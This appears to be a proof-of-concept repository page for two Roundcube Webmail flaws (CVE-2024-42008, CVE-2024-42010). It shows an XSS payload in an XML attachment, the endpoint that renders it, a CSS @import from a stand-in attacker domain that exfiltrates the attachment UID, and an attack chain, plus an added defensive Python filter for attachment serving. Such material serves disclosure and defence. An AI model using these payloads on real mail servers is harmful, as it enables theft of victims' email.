
CVE-2024-42008 PoC — Roundcube Webmail Security Vulnerability

Associated Vulnerability
Title: Roundcube Webmail Security Vulnerability (CVE-2024-42008)
Description: A Cross-Site Scripting vulnerability in rcmail_action_mail_get->run() in Roundcube through 1.5.7 and 1.6.x through 1.6.7 allows a remote attacker to steal and send emails of a victim via a malicious e-mail attachment served with a dangerous Content-Type header.
Description
PoC of Roundcube vulnerabilities CVE-2024-42008 and CVE-2024-42010
Readme
### Proof of Concept: CVE-2024-42008 and CVE-2024-42010

This proof of concept (PoC) demonstrates the exploitation of two vulnerabilities in Roundcube Webmail that enable CSS injection and cross-site scripting (XSS). The attack consists of two stages:

1. **XSS via malicious XML attachment (CVE-2024-42008)**
    
    Because of insufficient file upload checks, an XML file containing JavaScript can be sent as an attachment, e.g.
    
    ```xml
    <something:script xmlns:something="http://www.w3.org/1999/xhtml">
    	alert(origin)
    </something:script>
    ```
    
    This was a known issue, tracked as CVE-2020-13965, and the mitigation was to disable the "Open attachment" option. But the file can still be accessed through the endpoint
    
    ```
    https://roundcube.host.com/?_task=mail&_mbox=INBOX&_uid=[UID]&_part=2&_download=0&_action=get
    ```
    
    where UID is the unique identifier for this particular attachment in this particular mailbox (here INBOX).
    ![](xss.png)
    
2. **HTML exfiltration via CSS injection (CVE-2024-42010)**
    
    When sending an email, it is possible to inject your own CSS file, provided it is hosted on a domain that starts with `a`. Through that and a JavaScript server file that processes the requests made by the vulnerable Roundcube host, it is possible to extract the UID of the malicious XSS attachment.
    
    Import the CSS in a sent email with
    
    ```html
    <style>
    	@import "//a.attackerdomain.com/start?"
    </style>
    ```
    
    Host the JS server (roundcube-css-exploit.js) that exfiltrates the UID of the malicious attachment.
    ![](css.png)

**Attack Chain**
 1. Host the JavaScript server on your domain.
 2. Send an email with a malicious XML attachment and import the CSS from your domain.
 3. The victim opens the email and the UID gets exfiltrated.
 4. Then, depending on the preferred XSS delivery method, either send a second email with the attachment link or redirect the user to it.
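The defensive counterpart to stage 1, as an added example that is not Roundcube's code or part of this PoC: a minimal policy for an attachment-serving endpoint that forces a download whenever the declared Content-Type or the body looks like XML/HTML active content, instead of letting the browser render it inline. The function names, the type lists and the sample part are assumptions.

```python
"""Illustrative inline-vs-download policy for mail attachment parts.

Added example, not Roundcube's code: XML-family and HTML types are treated
as active content and the body is sniffed for markup a browser could
execute, so such parts are forced to download instead of rendered inline.
"""
import re

# Declared types a browser may render as a document and run script from.
ACTIVE_TYPES = {
    "text/html", "application/xhtml+xml", "text/xml", "application/xml",
    "image/svg+xml", "text/javascript", "application/javascript",
}
# Declared types allowed to display inline (assumed safelist).
INLINE_TYPES = {"text/plain", "image/png", "image/jpeg", "image/gif", "application/pdf"}
# Markup in the body that indicates executable XML/HTML regardless of the declared type.
_ACTIVE_MARKUP = re.compile(
    rb"<\s*[\w.-]*:?script\b|www\.w3\.org/1999/xhtml|<\s*html\b|<\s*svg\b", re.I
)

def normalize_type(content_type: str) -> str:
    """Strip parameters such as charset and lower-case the media type."""
    return content_type.split(";", 1)[0].strip().lower()

def is_active_content(content_type: str, body: bytes) -> bool:
    """True if the declared type or the first KiB of the body looks executable."""
    ctype = normalize_type(content_type)
    return (ctype in ACTIVE_TYPES or ctype.endswith("+xml")
            or _ACTIVE_MARKUP.search(body[:1024]) is not None)

def response_headers(content_type: str, body: bytes, download: bool = False) -> dict:
    """Headers for serving a part: inline only for safelisted, inert content."""
    ctype = normalize_type(content_type)
    if download or ctype not in INLINE_TYPES or is_active_content(ctype, body):
        return {"Content-Type": "application/octet-stream",
                "Content-Disposition": "attachment",
                "X-Content-Type-Options": "nosniff"}
    return {"Content-Type": ctype,
            "Content-Disposition": "inline",
            "X-Content-Type-Options": "nosniff"}

if __name__ == "__main__":
    # Constructed sample: an XML part carrying the XHTML script element from the PoC.
    sample = b'<x:script xmlns:x="http://www.w3.org/1999/xhtml">alert(origin)</x:script>'
    print(response_headers("text/xml", sample))                      # forced download
    print(response_headers("text/plain; charset=utf-8", b"hello"))   # inline
```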

**Source: [Government Emails at Risk: Critical Cross-Site Scripting Vulnerability in Roundcube Webmail (Sonar's Vulnerability Research Team)](https://www.sonarsource.com/blog/government-emails-at-risk-critical-cross-site-scripting-vulnerability-in-roundcube-webmail/)**
File Snapshot

```
[4.0K] /data/pocs/011c8ae6a886f6dee6dec9936e8e8f055aa91f42
├── [208K] css.png
├── [2.2K] README.md
├── [3.1K] roundcube-css-exploit.js
└── [ 98K] xss.png

0 directories, 4 files
```